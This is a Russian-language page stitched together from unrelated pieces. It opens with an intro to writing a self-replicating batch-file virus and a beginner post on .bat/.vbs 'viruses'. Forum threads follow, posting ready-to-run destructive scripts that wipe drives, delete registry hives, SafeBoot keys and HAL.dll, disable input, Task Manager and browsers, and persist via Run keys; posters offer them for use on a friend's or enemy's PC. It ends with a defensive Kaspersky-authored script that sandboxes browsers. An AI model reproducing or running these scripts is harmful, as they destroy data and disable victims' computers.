
! Внимание. Вся приведенная информация в статье приводится ИСКЛЮЧИТЕЛЬНО в образовательных целях. Вся информация взята из открытых источников, в том числе из справки Майкрософт !
Что такое BAT вирус (БАТ вирус)
Прежде — .bat это расширение для текстовых файлов с набором команд сценариев (скрипт) командного интерпретатора. В переводе с английского — означает пакетный файл. Имеет синтаксис наиболее близок к набору команд древней ОС MS DOS (ныне — подсистема ОС Windows). Используется для автоматизации некоторых процессов, например, запуск программ с определенными параметрами.
БАТ, как скриптовый язык программирования, является достаточно примитивным и значительно уступает даже таким языкам сценариев, как VBS (Visual Basic Script). Но пакетные файлы позволяют выполнять достаточно большой объем задач, чтобы создавать на них различных зловредов. Например, можно в пакетном файле прописать команды для удаления системных файлов, что может привести к нестабильности работы системы. Подобное действие — удаление чего-либо, может выполниться и вручную. Скрипт позволяет это автоматизировать.
Важное уточнение. В батниках можно реализовать различные типы зловредов. Это могут быть программы-шутники, которые будут «подшучивать» над пользователем, например, прятать курсор мышки или выполнять перезагрузку компьютера. Такие скрипты будут скорее относиться к категории троянов — программ, выполняющие скрытые, часто небезопасные действия.
Цель же этой статьи — скрипты, которые будут относиться к категории компьютерных вирусов. То есть программы, которые будут находить определенные типы файлов и заражать их. По способу заражения наш скрипт будет соответствовать опасным нерезидентным вирусам. Наша программа будет пролистать все папки, начиная с корня диска С:\\, производя поиск других батников, замещать собой код (текст) атакуемого файла. Нерезидентный означает, что наш зловред будет получать управление только при непосредственном запуске, без возможности находиться постоянно в памяти компьютера.
Также обрати внимание — далее скрипт БАТ вируса будет приведен по частям. Сделано это по причине того, что все директивы, написанные вместе могут детектироваться как вредоносная программа и блокироваться антивирусами или встроенным защитником Windows. Приведенной информации вполне хватит, чтобы собрать своего «зверя».
















И так, в этом посте я конкретно расскажу про два формата: .bat и .vbs
Начнем с того, что разница в этих форматах принципиальная.Если сохранить команду в .bat, то компьютер будет выполнять то, то вы написали. Например написали команду для выключения компьютера. Сохранили в расширении .bat Если вы откроете этот файл, то ваш комп выключится, т.к. это было написано в программе. И сразу предупреждение: нельзя скрещивать в одной команде .bat и .vbs! У вас либо заглючит комп, либо начнет выполнять все команды одновременно и сломается.
Расширение .vbs это последовательное выполнение действий. Например в коде вы написали:
msgbox”Нажмите да или нет”,32+4,”Выбор”
Если вы сохраните этот текст в .vbs , то при открытие у вас откроется вот такое поле:

При любом нажатии на кнопку (да,нет,крестик) окно закроется. Но! Если вы добавите в код что-то после первого окна, то при любом нажатии на кнопку (да,нет,крестик) у вас откроется следующее окно. Добавим одну строчку и получится вот это:
msgbox”Нажмите да или нет”,32+4,”Выбор”
msgbox”Нажмите ок для продолжения.”,64,”Нажмите!”

Этот код можно продолжать бесконечно. Главное не написать лишний символ/цифру. Никто вам не покажет, где ошибка. Код просто не запустится.
Думаю разница между двумя форматами понятна.
Также через формат .vbs можно полностью сломать комп, отключить Интернет, заблокировать Вконтакте, отключить мышку и клаву (навсегда!), сделать так, чтобы системник бесконечно пищал и т.д.
В конце поста будет ссылка на один сайт, где написаны команды для .bat вирусов.
Также удобность этих форматов в том, что если вы только начинаете создавать вирусы, новичок, то вы легко можете скопировать любой код, изменять там текст и использовать его. В кодах все интуитивно понятно. Что за что отвечает, что где писать. В следующем посту я накидаю сайтов, где вы сможете узнать как менять картинку в окне, что писать для того, чтобы в окне было “ок”,”продолжить” и т.д., что нельзя писать, как командой открыть файл, как сделать вирус-спамер и другое.
Окей, мой пост заканчивается. Чуть позже я более подробно расскажу про коды, про различные команды.
Пишите больше милых комментариев, мне приятно. Удачи!
Вам необходимо обновить браузер или попробовать использовать другой.
- Статус
- В этой теме нельзя размещать новые ответы.
- Дней с нами
- 2.483
- Розыгрыши
- 0
- Сообщения
- 322
- Репутация
+/-
- Реакции
- 251
2. Не тестируйте эти коды на своем ПК
3. Тема – баян
Что понадобится для создания вируса:
- Открыть Блокнот
- Вставить нужные коды
- Сохранить файл в формате .bat
Коды:
Удаляет все с доп. носителей
Удаляет все что хранится в реестре
@echo OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
Останавливает доступ в Интернет пользователя. Чтобы получить доступ обратно напишите IPconfig /renew в CMD
@echo off
Ipconfig /release
Отправляет сообщение и выключает компьютер
@echo off
msg * ваше сообщение
shutdown -c “ваше сообщение” -s
Простой вирус, который заставляет компьютер дать ошибку.
Сохранить как файл.VBS
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next
Форматируются диски менее чем за 5 секунд. Только D, Е и С
rd/s/q D:\
rd/s/q C:\
rd/s/q E:\
Останавливает компьютер каждый раз при его включении
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo “любой текст”
PAUSE
А теперь более опасные батники:
Заставляет систему упасть один раз потом компьютер не может быть перезапущен. Он удаляет все необходимое для запуска системы
НЕ ИСПОЛЬЗУЙТЕ НА СЕБЕ
- Дней с нами
- 2.483
- Розыгрыши
- 0
- Сообщения
- 322
- Репутация
+/-
- Реакции
- 251
- Дней с нами
- 3.189
- Розыгрыши
- 0
- Сообщения
- 855
- Репутация
+/-
- Реакции
- 1.091
1. Этот гайд создан в ознакомительных целях, например для контроля над ребенком
2. Не тестируйте эти коды на своем ПК
3. Тема – баянЧто понадобится для создания вируса:
- Открыть Блокнот
- Вставить нужные коды
- Сохранить файл в формате .bat
Коды:
Удаляет все с доп. носителей
Удаляет все что хранится в реестре
Останавливает доступ в Интернет пользователя. Чтобы получить доступ обратно напишите IPconfig /renew в CMD
Отправляет сообщение и выключает компьютер
Простой вирус, который заставляет компьютер дать ошибку.
Сохранить как файл.VBSФорматируются диски менее чем за 5 секунд. Только D, Е и С
Останавливает компьютер каждый раз при его включении
А теперь более опасные батники:
Заставляет систему упасть один раз потом компьютер не может быть перезапущен. Он удаляет все необходимое для запуска системы
НЕ ИСПОЛЬЗУЙТЕ НА СЕБЕ
Этот вирус отключает Интернет навсегда
ебать ты черт конешно
- Дней с нами
- 2.691
- Розыгрыши
- 0
- Сообщения
- 719
- Репутация
+/-
- Реакции
- 858
- Дней с нами
- 2.779
- Розыгрыши
- 19
- Сообщения
- 30.543
- Репутация
+/-
- Реакции
- 38.212
Хоть щас пихай во всякие сборки по minecraft под названием start.bat
Ну блять..Это же скучно…Вот если винлокер туда запихать…
- Дней с нами
- 3.250
- Розыгрыши
- 0
- Сообщения
- 53
- Репутация
+/-
- Реакции
- 20
- Дней с нами
- 2.483
- Розыгрыши
- 0
- Сообщения
- 322
- Репутация
+/-
- Реакции
- 251
Все сработает когда вставишь код или сохранишь? Или когда откроешь???
Либо когда введешь это сразу в cmd, либо когда сохранишь файл с блокнота под расширением .bat и откроешь его
- Дней с нами
- 3.151
- Розыгрыши
- 0
- Сообщения
- 317
- Репутация
+/-
- Реакции
- 363
- Дней с нами
- 2.691
- Розыгрыши
- 0
- Сообщения
- 719
- Репутация
+/-
- Реакции
- 858
Либо когда введешь это сразу в cmd, либо когда сохранишь файл с блокнота под расширением .bat и откроешь его
А для этого не нужно запустить батник от имени админа? CMD же тогда будет без возможностей администратора и врятли сможет что-то серьёзное удалить.
- Дней с нами
- 2.264
- Розыгрыши
- 0
- Сообщения
- 26
- Репутация
+/-
- Реакции
- 16
- Дней с нами
- 2.623
- Розыгрыши
- 1
- Сообщения
- 3.370
- Репутация
+/-
- Реакции
- 3.630
В годах так 2000 ты бы был мега хакер,а сейчас и школьники так могют делать
Игнорщик,бака!
- Дней с нами
- 3.151
- Розыгрыши
- 0
- Сообщения
- 317
- Репутация
+/-
- Реакции
- 363
там от опытного,а я ещё не дорос.Так,что не могу дать и да,я тебе отвечал хз чё такое
- Дней с нами
- 2.950
- Розыгрыши
- 0
- Сообщения
- 320
- Репутация
+/-
- Реакции
- 160
- Дней с нами
- 2.391
- Розыгрыши
- 0
- Сообщения
- 2.172
- Репутация
+/-
- Реакции
- 908
1. Этот гайд создан в ознакомительных целях, например для контроля над ребенком
2. Не тестируйте эти коды на своем ПК
3. Тема – баянЧто понадобится для создания вируса:
- Открыть Блокнот
- Вставить нужные коды
- Сохранить файл в формате .bat
Коды:
Удаляет все с доп. носителей
Удаляет все что хранится в реестре
Останавливает доступ в Интернет пользователя. Чтобы получить доступ обратно напишите IPconfig /renew в CMD
Отправляет сообщение и выключает компьютер
Простой вирус, который заставляет компьютер дать ошибку.
Сохранить как файл.VBSФорматируются диски менее чем за 5 секунд. Только D, Е и С
Останавливает компьютер каждый раз при его включении
А теперь более опасные батники:
Заставляет систему упасть один раз потом компьютер не может быть перезапущен. Он удаляет все необходимое для запуска системы
НЕ ИСПОЛЬЗУЙТЕ НА СЕБЕ
Этот вирус отключает Интернет навсегда
классно скопировал инфу с любого сайта 2012 и раньше года по запросу вирус в блокноте
- Дней с нами
- 2.483
- Розыгрыши
- 0
- Сообщения
- 322
- Репутация
+/-
- Реакции
- 251
классно скопировал инфу с любого сайта 2012 и раньше года по запросу вирус в блокноте
Я написал, что тема – баян и она создана для тех, кто не додумался погуглить
- Дней с нами
- 2.522
- Розыгрыши
- 3
- Сообщения
- 3.595
- Репутация
+/-
- Реакции
- 4.082
- Telegram
- wavvy_the9
Но так думаю будет проще

- Статус
- В этой теме нельзя размещать новые ответы.
Вам необходимо обновить браузер или попробовать использовать другой.
- Статус
- В этой теме нельзя размещать новые ответы.
- Дней с нами
- 2.680
- Розыгрыши
- 0
- Сообщения
- 839
- Репутация
+/-
- Реакции
- 1.552
Дарую вам коды батников, которые могут как пошутить над пк вашего друга, или недруга, так и навредить ему. К слову, батник – это Пакетный файл Виндовс с расширением .bat – из-за этого и “батник”. Как его создать? Создаём текстовый файл, вставляем код одного из вирусов, далее сохраняем как файл с расширением .bat . Всё. ГГ ВП.
1)
2)
Код:
3)
Код:
@echo off
copy %0 %WinDir%\Win32.bat > nul
copy %0 %windir%\Win32.bat > nul
reg add “HKLM\Software\Microsoft\Windows\CurrentVersion\Run” /v Win32 /t REG_SZ /d %windir%\Win32.bat /f
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot\*.* /q
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /q
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nul
rundll32 mouse,disable > nul
rundll32 keyboard,disable > nul
rundll32 user,disableoemlayer > nul
@echo off
taskkill /im /f chrome.exe
taskkill /im /f ie.exe
taskkill /im /f firefox.exe
taskkill /im /f opera.exe
taskkill /im /f safari.exe
del C:\Program Files\Google\Chrome\Application\chrome.exe /q
del C:\Program Files\Safari\safari.exe /q
del C:\Program Files\Mozilla Firefox\firefox.exe /q
del C:\Program Files\Opera\opera.exe /q
del C:\Program Files\Internet Explorer\ie.exe /q
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f > nul
taskkill /f /im explorer.exe > nul
del: *.*/q > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
del %WinDir%\system32\HAL.dll/q > nul
del “%SystemRoot%\Driver Cache\i386\driver.cab” /f /q >nul
del “%SystemRoot%\Media” /q > nul
assoc .lnk=.txt
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
del “%SystemRoot%\Cursors\*.*” >nul
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
copy “%0” “%SystemRoot%\system32\sys321.bat > nul
del %0
Автозагрузка и копирование в систему стоят лишь в “Жопо-трошитиле 2000”, по желанию их можно добавить кодом(вставляете перед основным кодом вируса, с новой строчки):
copy %0 %WinDir%\Win32.bat > nul
copy %0 %windir%\Win32.bat > nul
reg add “HKLM\Software\Microsoft\Windows\CurrentVersion\Run” /v Win32 /t REG_SZ /d %windir%\Win32.bat /f
- Дней с нами
- 2.353
- Розыгрыши
- 4
- Сообщения
- 2.885
- Репутация
+/-
- Реакции
- 4.566
- Дней с нами
- 2.496
- Розыгрыши
- 0
- Сообщения
- 530
- Репутация
+/-
- Реакции
- 733
сижу сейчас винду переустанавливаю
чо хотел сказать-то
пидор ты
- Дней с нами
- 2.560
- Розыгрыши
- 0
- Сообщения
- 13
- Репутация
+/-
- Реакции
- 4
запустил жопо-трошитель на своем пк случайно
сижу сейчас винду переустанавливаю
чо хотел сказать-то
пидор ты
пиздишь
- Дней с нами
- 2.417
- Розыгрыши
- 0
- Сообщения
- 210
- Репутация
+/-
- Реакции
- 161
- Дней с нами
- 2.940
- Розыгрыши
- 5
- Сообщения
- 732
- Репутация
+/-
- Реакции
- 1.006
- Дней с нами
- 3.110
- Розыгрыши
- 0
- Сообщения
- 337
- Репутация
+/-
- Реакции
- 535
- Дней с нами
- 2.746
- Розыгрыши
- 0
- Сообщения
- 359
- Репутация
+/-
- Реакции
- 306
Нам нужны гандоны на компьютер от Microsoft
- Дней с нами
- 2.584
- Розыгрыши
- 0
- Сообщения
- 618
- Репутация
+/-
- Реакции
- 1.123
- Дней с нами
- 2.756
- Розыгрыши
- 0
- Сообщения
- 25
- Репутация
+/-
- Реакции
- 6
- Дней с нами
- 2.454
- Розыгрыши
- 0
- Сообщения
- 493
- Репутация
+/-
- Реакции
- 636
- Дней с нами
- 3.168
- Розыгрыши
- 0
- Сообщения
- 462
- Репутация
+/-
- Реакции
- 408
- Дней с нами
- 2.521
- Розыгрыши
- 0
- Сообщения
- 227
- Репутация
+/-
- Реакции
- 116
- Дней с нами
- 2.497
- Розыгрыши
- 0
- Сообщения
- 3.819
- Репутация
+/-
- Реакции
- 3.154
Уважаемый @F1N ! Прошу оценить:
Дарую вам коды батников, которые могут как пошутить над пк вашего друга, или недруга, так и навредить ему. К слову, батник – это Пакетный файл Виндовс с расширением .bat – из-за этого и “батник”. Как его создать? Создаём текстовый файл, вставляем код одного из вирусов, далее сохраняем как файл с расширением .bat . Всё. ГГ ВП.
1)Данный вирус отключает клавиатуру и мышь, убивает процесс Проводника; открывает консоль в которой пишется: “Deleting system, n files deleted…”2)
Данный вирус заставит пк зависнуть, каким бы он крутым не был, суть его в том, что он начинает бесконечно включать и выключать Paint, вроде ничего такого, а пк начинает лагать. Не верите, попробуйте!)
Код:3)
Короче этот вирус:
Код:
@echo off
copy %0 %WinDir%\Win32.bat > nul
copy %0 %windir%\Win32.bat > nul
reg add “HKLM\Software\Microsoft\Windows\CurrentVersion\Run” /v Win32 /t REG_SZ /d %windir%\Win32.bat /f
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot\*.* /q
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /q
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nul
rundll32 mouse,disable > nul
rundll32 keyboard,disable > nul
rundll32 user,disableoemlayer > nul
@echo off
taskkill /im /f chrome.exe
taskkill /im /f ie.exe
taskkill /im /f firefox.exe
taskkill /im /f opera.exe
taskkill /im /f safari.exe
del C:\Program Files\Google\Chrome\Application\chrome.exe /q
del C:\Program Files\Safari\safari.exe /q
del C:\Program Files\Mozilla Firefox\firefox.exe /q
del C:\Program Files\Opera\opera.exe /q
del C:\Program Files\Internet Explorer\ie.exe /q
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f > nul
taskkill /f /im explorer.exe > nul
del: *.*/q > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
del %WinDir%\system32\HAL.dll/q > nul
del “%SystemRoot%\Driver Cache\i386\driver.cab” /f /q >nul
del “%SystemRoot%\Media” /q > nul
assoc .lnk=.txt
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
del “%SystemRoot%\Cursors\*.*” >nul
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
copy “%0” “%SystemRoot%\system32\sys321.bat > nul
del %0Автозагрузка и копирование в систему стоят лишь в “Жопо-трошитиле 2000”, по желанию их можно добавить кодом(вставляете перед основным кодом вируса, с новой строчки):
@echo off
copy %0 %WinDir%\Win32.bat > nul
copy %0 %windir%\Win32.bat > nul
reg add “HKLM\Software\Microsoft\Windows\CurrentVersion\Run” /v Win32 /t REG_SZ /d %windir%\Win32.bat /f
а для Линуха что подскажешь?
- Дней с нами
- 3.110
- Розыгрыши
- 0
- Сообщения
- 337
- Репутация
+/-
- Реакции
- 535
- Дней с нами
- 2.447
- Розыгрыши
- 0
- Сообщения
- 11
- Репутация
+/-
- Реакции
- 4
- Дней с нами
- 2.522
- Розыгрыши
- 3
- Сообщения
- 3.595
- Репутация
+/-
- Реакции
- 4.082
- Telegram
- wavvy_the9
- Дней с нами
- 2.950
- Розыгрыши
- 0
- Сообщения
- 320
- Репутация
+/-
- Реакции
- 160
- Статус
- В этой теме нельзя размещать новые ответы.
Батники против эксплойтов
Я понимаю, что для всех батники выглядят как нечто очень простое и со времен AUTOEXEC.BAT уже практически забытое, в то же время эксплойты, если вы конечно не профессиональный исследователь уязвимостей, выглядят очень сложно и практически неправдоподобно, особенно для некоторых разработчиков. Но! В данном посте я постараюсь перевернуть эти представления и рассказать, что всё как будто наоборот. Батники чуть легче и сильнее по функционалу brainfuck‘а, а эксплойты не страшнее сортировки пузырьком на basic’е.

(Осторожно! 3 МБ иллюстрированного потока сознания и куча скриптов)
Как я до этого дошел?
Мне тут на глаза попалась коробка с Windows 7 x64 c минимальными системными требованиями в 2 ГБ оперативной памяти! И я тут подумал, неужели во всех этих гигабайтах не найдётся пары килобайт кода, которые могли бы защитить пользователей от такой напасти, как эксплойты и Drive-by? Это бич всех ОС от MS уже лет пять! Должны быть там средства для хоть какой-то защиты? Но как их заюзать, да еще и стандартными средствами? С помощью батников. А как? Чтобы это понять, нужно прочитать эту простыню до конца. 8)
Теория

Если копнуть чуть глубже, то оказывается, что в таких эксплойт-паках часто (практически всегда) полезная нагрузка выделяет себе память в процессе жертвы, ищет нужные системные функции, сохраняет файл из интернета на локаль и делает CreateProcess или очень редко — ShellExecute, при этом проблемы повышения привилегий перекладываются на то, что скачали. Всё в принципе просто и понятно. И чего с этим делать? Хватать
за пятую точку
за слабые места! Во всей этой схеме есть одно уязвимое место: неважно, какое приложение пробили, главное — запустить файл с троянцем. Таким образом, получается, что нам просто-напросто надо сделать так, чтобы на компьютере пользователя лишние файлы не запускались, и сделать это нужно стандартными средствами.
Стандартные средства
В Windows 7 есть несколько способов ограничить или расширить работу программ. Самыми популярными средствами, пожалуй, являются ACL и всяческие политики.
Наглядная схема SRP (Software Restriction Policies) от Microsoft
В принципе, ни для кого не секрет, что можно создать специальную учетную запись пользователя, назначить ему специальные права в системе и гонять под ним потенциально уязвимые приложения. Пять минут руления мышкой — и всё готово. Проблема в том, что редкий пользователь будет этим заниматься, особенно, если это потребуется сделать админам на всех машинах в сети. Поэтому давайте-ка попробуем сделать батник, в котором сделаем примерно то же самое, только лучше, да еще так, чтобы пользоваться этим было удобно.
Батник
1. Создать пользователя. Халява.
2. Модифицировать права. Э… а вот тут уже есть проблемы
По-хорошему назначать права на исполнение нужно AppLocker‘ом с помощью PowerShell’a, например так:
Однако, вся эта хитрая хрень «is only available in Ultimate and Enterprise versions of Windows 7». Поэтому как альтернативу в Home версии Windows 7 можно использовать Parental Control (ссылка на форум — я не шучу), который хранит информацию о том, какие программы можно запускать в:
Значит, политики в топку, ибо неудобно, будем использовать ACL, тем более что, начиная с Vista’ы, появилась замечательная команда ICACLS. В принципе всё, что написано дальше, может быть спроецировано и на XP c помощью XCACLS, но по умолчанию такой команды в XP нет, и входит она только в пакет Resource Kit.
Итого, в Windows 7 cначала вынесем пользователя из группы по умолчанию, чтобы ограничить его возможности благодаря групповым разрешениям создавать файлы где попало:
А теперь скажем, что, дорогой пользователь,
ты — неудачник
, тебе запрещено запускать файлы из профайла, того единственного места, где тебе разрешено создавать файлы.
Параметры «(OI)(IO)» как бы говорят нам, что все файлы, находящиеся в указанной папке, наследуют права родителя, которые, собственно, Deny Execute. Проверяем, что выставленные права работают:
Итого: Notepad.exe из папки Windows работает, а если его скопировать в папку TEMP и запустить, то ACCESS IS DENIED. Всё ОК. Идём дальше.
3. Удобство использования
Для удобства использования нам нужно обеспечить поддержку прозрачного запуска для максимального количества разнообразных браузеров под новым пользователем. Делать это предлагаю так:
1. Скопировать профайл браузера текущего пользователя к новому пользователю. Например, для Firefox’а так:
2. Создать в папке с браузером VBS файл, в котором прописать запуск Runas браузера. Делать это нужно через VBS, чтобы обойти ограничение по приёму пароля в STDIN к Runas’у. Прекрасный Microsoft сделал это, чтобы повысить защищенность своей ОС. Как обычно, защищенность осталась под вопросом, а геморроя прибавилось. VBS файл при этом будет выглядеть, например, так:
3. Создать ярлык на новосозданный VBS файл c иконкой браузера.
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\firefox_saferun.LNK"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\Program Files (x86)\Mozilla Firefox\firefox.vbs"
oLink.IconLocation = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe,0"
oLink.WorkingDirectory = "C:\Program Files (x86)\Mozilla Firefox\"
oLink.Save
4. Заменить новым ярлыком все уже имеющиеся у пользователя ярлыки на браузеры. Шутка. Положим ярлыки в отдельную папку на рабочем столе, а там пользователь пусть сам решает.
Листинг батника
Итого вроде всё ОК, осталось это всё причесать и оттестить.
::Writed by: Sergey.Golovanov at kaspersky.com for habrahabr.ru
@echo on
@Echo This batch file will create a new user for browsers with no rights to run downloaded from Internet files.
Pause
::Setup new user::
set safeusername=saferun_user_%random%
set safepassword=%random%Ai%random%
echo Login: %safeusername%
echo Password: %safepassword%
net user %safeusername% /delete
del Browserlist4saferun.txt
net user %safeusername% %safepassword% /add
::init new user profile::
echo Option explicit > init_new_user_profile.vbs
echo Dim oShell >> init_new_user_profile.vbs
echo set oShell= Wscript.CreateObject("WScript.Shell") >> init_new_user_profile.vbs
echo oShell.Run "RunAs /profile /user:%safeusername% ping" >> init_new_user_profile.vbs
echo WScript.Sleep 1000 >> init_new_user_profile.vbs
echo oShell.Sendkeys "%safepassword%" >> init_new_user_profile.vbs
echo oShell.Sendkeys "{ENTER}" >> init_new_user_profile.vbs
echo Wscript.Quit >> init_new_user_profile.vbs
call cscript init_new_user_profile.vbs
ping -n 10 localhost >> nul
del init_new_user_profile.vbs
::Setup privileges for new user::
net localgroup users %safeusername% /delete
icacls c:\users\%safeusername%\ /deny %safeusername%:(OI)(IO)(WDAC,WO,X)
::Setup browsers::
:FindOpera
if exist %APPDATA%\Opera\ xcopy /E /I /C /Y /Q /H /R %APPDATA%\Opera\* C:\Users\%safeusername%\AppData\Roaming\Opera\
if exist "%Programfiles%\Opera\Opera.exe" goto run4opera
if exist "%Programfiles(x86)%\Opera\Opera.exe" goto run4operax86
Goto FindFireFox
:run4opera
echo Opera^|%Programfiles%\Opera>> Browserlist4saferun.txt
Goto FindFireFox
:run4operax86
Set Browsername=Opera
echo Opera^|%Programfiles(x86)%\Opera>> Browserlist4saferun.txt
Goto FindFireFox
:FindFireFox
if exist %APPDATA%\Mozilla\ xcopy /E /I /C /Y /Q /H /R %APPDATA%\Mozilla\* C:\Users\%safeusername%\AppData\Roaming\Mozilla\
if exist "%Programfiles%\Mozilla Firefox\Firefox.exe" goto run4Firefox
if exist "%Programfiles(x86)%\Mozilla Firefox\Firefox.exe" goto run4Firefoxx86
Goto FindChrome
:run4Firefox
echo Firefox^|%Programfiles%\Mozilla Firefox>> Browserlist4saferun.txt
Goto FindChrome
:run4Firefoxx86
echo Firefox^|%Programfiles(x86)%\Mozilla Firefox>> Browserlist4saferun.txt
Goto FindChrome
:FindChrome
If exist %LOCALAPPDATA%\Google\Chrome\Application\chrome.exe goto run4chrome
Goto FindIE
:run4chrome
::// Can work for some versions of Chrome by not stable. Dissabled for performance.
::xcopy /E /I /C /Y /Q /H /R %LOCALAPPDATA%\Google\Chrome\* C:\Users\%safeusername%\AppData\Local\Google\Chrome\
::for /r C:\Users\%safeusername%\AppData\Local\Google\Chrome\ %%C in (*.exe) do icacls %%C /grant %safeusername%:(X)
::for /r C:\Users\%safeusername%\AppData\Local\Google\Chrome\ %%C in (*.dll) do icacls %%C /grant %safeusername%:(X)
::echo Chrome^|C:\Users\%safeusername%\AppData\Local\Google\Chrome\Application\>> Browserlist4saferun.txt
Goto FindIE
:FindIE
::// TODO A lot of XCOPYs
if exist "%LOCALAPPDATA%\Microsoft\Internet Explorer" (
xcopy /E /I /C /Y /Q /H /R "%USERPROFILE%\Favorites\*" "C:\Users\%safeusername%\Favorites\"
xcopy /E /I /C /Y /Q /H /R "%LOCALAPPDATA%\Microsoft\Internet Explorer\*" "C:\Users\%safeusername%\AppData\Local\Microsoft\Internet Explorer\"
xcopy /E /I /C /Y /Q /H /R "%LOCALAPPDATA%\Microsoft\Windows\History\*" "C:\Users\%safeusername%\AppData\Local\Windows\History\"
xcopy /E /I /C /Y /Q /H /R "%APPDATA%\Roaming\Microsoft\Windows\Cookies\*" "C:\Users\%safeusername%\AppData\Roaming\Microsoft\Windows\Cookies\"
)
if exist "%Programfiles(x86)%\Internet Explorer\iexplore.exe" goto run4iex86
if exist "%Programfiles%\Internet Explorer\iexplore.exe" goto run4ie
:run4iex86
echo IExplore^|%Programfiles(x86)%\Internet Explorer>> Browserlist4saferun.txt
goto MakeLinks
:run4ie
echo IExplore^|%Programfiles%\Internet Explorer>> Browserlist4saferun.txt
::Make links::
:MakeLinks
rd /s /q %USERPROFILE%\Downloads\Browser
rd /s /q %USERPROFILE%\Desktop\SafeLinks
mklink /d %USERPROFILE%\Downloads\Browser C:\Users\%safeusername%\Downloads
mkdir %USERPROFILE%\Desktop\SafeLinks
echo on
For /f "tokens=1,2 delims=|" %%A in (Browserlist4saferun.txt) do (
echo Option explicit > "%%B\%%A.vbs"
echo Dim oShell >> "%%B\%%A.vbs"
echo set oShell= Wscript.CreateObject^("WScript.Shell"^) >> "%%B\%%A.vbs"
echo oShell.Run "RunAs /user:%safeusername% %%A.exe" >> "%%B\%%A.vbs"
echo WScript.Sleep 1000 >> "%%B\%%A.vbs"
echo oShell.Sendkeys "%safepassword%" >> "%%B\%%A.vbs"
echo oShell.Sendkeys "{ENTER}" >> "%%B\%%A.vbs"
echo Wscript.Quit >> "%%B\%%A.vbs"
echo Set oWS = WScript.CreateObject^("WScript.Shell"^) > "%USERPROFILE%\Desktop\SafeLinks\%%A.lnk.vbs"
echo sLinkFile = "%USERPROFILE%\Desktop\SafeLinks\%%A_saferun.LNK" >> "%USERPROFILE%\Desktop\SafeLinks\%%A.lnk.vbs"
echo Set oLink = oWS.CreateShortcut^(sLinkFile^) >> "%USERPROFILE%\Desktop\SafeLinks\%%A.lnk.vbs"
echo oLink.TargetPath = "%%B\%%A.vbs" >> "%USERPROFILE%\Desktop\SafeLinks\%%A.lnk.vbs"
echo oLink.IconLocation = "%%B\%%A.exe,0" >> "%USERPROFILE%\Desktop\SafeLinks\%%A.lnk.vbs"
echo oLink.WorkingDirectory = "%%B\" >> "%USERPROFILE%\Desktop\SafeLinks\%%A.lnk.vbs"
echo oLink.Save >> "%USERPROFILE%\Desktop\SafeLinks\%%A.lnk.vbs"
)
for /r %USERPROFILE%\Desktop\SafeLinks\ %%p in (*.vbs) do cscript %%p
for /r %USERPROFILE%\Desktop\SafeLinks\ %%v in (*.vbs) do del %%v
:: Open Explorer with links::
explorer %USERPROFILE%\Desktop\SafeLinks\
:: Create Uninstall::
echo @echo off > uninstall_%~n0.bat
echo net user %safeusername% /del >> uninstall_%~n0.bat
echo rd /s /q %USERPROFILE%\Downloads\Browser >> uninstall_%~n0.bat
echo rd /s /q %USERPROFILE%\Desktop\SafeLinks >> uninstall_%~n0.bat
echo rd /s /q C:\Users\%safeusername%\ >> uninstall_%~n0.bat
echo For /f "tokens=1,2 delims=|" %%%%A in (Browserlist4saferun.txt) do del "%%%%B\%%%%A.vbs" >> uninstall_%~n0.bat
echo del Browserlist4saferun.txt >> uninstall_%~n0.bat
echo del %%0 >> uninstall_%~n0.bat
:ExitТестирование
Ну-с, а теперь попробуем, как это всё работает в дикой природе:
1. Выключаем антивирус и даунгрейдим, например, JAVA (чета мне сразу не по себе стало).
2. Копипастим батник из листинга.
3. Сохраняем его как saferun.bat, делаем глубокий вдох и кликаем на него два раза.
4. Мигают консоли и открывается окно эксплорера. Смотрим на окно с ярлыками и много думаем.
5. Выбираем любой браузер. Идём на Youtube, проверяем, что всё работает, кликается и т.д.


8. Проверяем права на файл «____991.exe»

